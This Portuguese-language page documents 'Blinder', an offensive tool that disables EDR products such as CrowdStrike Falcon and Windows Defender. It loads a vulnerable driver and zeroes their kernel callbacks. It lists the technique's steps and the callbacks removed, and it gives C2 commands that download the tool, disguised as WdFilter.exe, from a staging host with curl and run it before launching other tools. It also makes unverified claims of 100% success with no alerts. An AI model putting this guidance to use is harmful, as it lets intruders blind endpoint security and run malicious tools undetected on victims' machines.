Blinder

Silenciador de EDR via remocao de callbacks do kernel

Voltar

100% Efetivo contra CrowdStrike Falcon

Remove 70+ callbacks do kernel. Permite execucao de ferramentas bloqueadas sem alertas.

O que e

Ferramenta que cega EDRs removendo seus callbacks no kernel. Em vez de matar processos (o que gera alerta), zera os ponteiros de callback - o EDR continua rodando mas perde a visibilidade.

Tecnica: BYOVD (Bring Your Own Vulnerable Driver)
Privilegio: Administrator
Persistencia: Nenhuma - precisa rodar apos cada reboot

Como Funciona

Carrega driver vulneravel (WinCollectorPilot.sys)
Mapeia memoria fisica via IOCTLs do driver
Page Walk para encontrar CR3 do kernel
Localiza arrays de callbacks usando offsets por build
Zera ponteiros que apontam para modulos de EDR
Cleanup automatico do driver

Callbacks Removidos

Tipo	O que monitora
Process Creation	Criacao de processos
Thread Creation	Criacao de threads
Image Load	Carregamento de DLLs/EXEs
Object (Process/Thread)	Handles de processo e thread
Minifilter	Operacoes de I/O em arquivos

Uso

Comandos

Comando	Descricao
`WdFilter.exe -l`	Lista callbacks ativos
`WdFilter.exe -d`	Remove callbacks de EDR

Via C2

run curl -o WdFilter.exe http://STAGING/WdFilter.exe
run WdFilter.exe -d
run cmd /c "ferramenta.exe parametros"

Resultados

EDR	Status	Callbacks Removidos
CrowdStrike Falcon	Funciona	70+
Windows Defender	Funciona	Variavel

Metricas (CrowdStrike)

Tempo de execucao

~15 segundos

Taxa de sucesso

100%

Alertas gerados

Nenhum

Crash/BSOD

Nenhum

Limitacoes

Nao persiste! Apos reboot, callbacks voltam. Precisa executar novamente.

Requer privilegio de administrador
Offsets variam por build do Windows
Registry callbacks nao removidos em alguns builds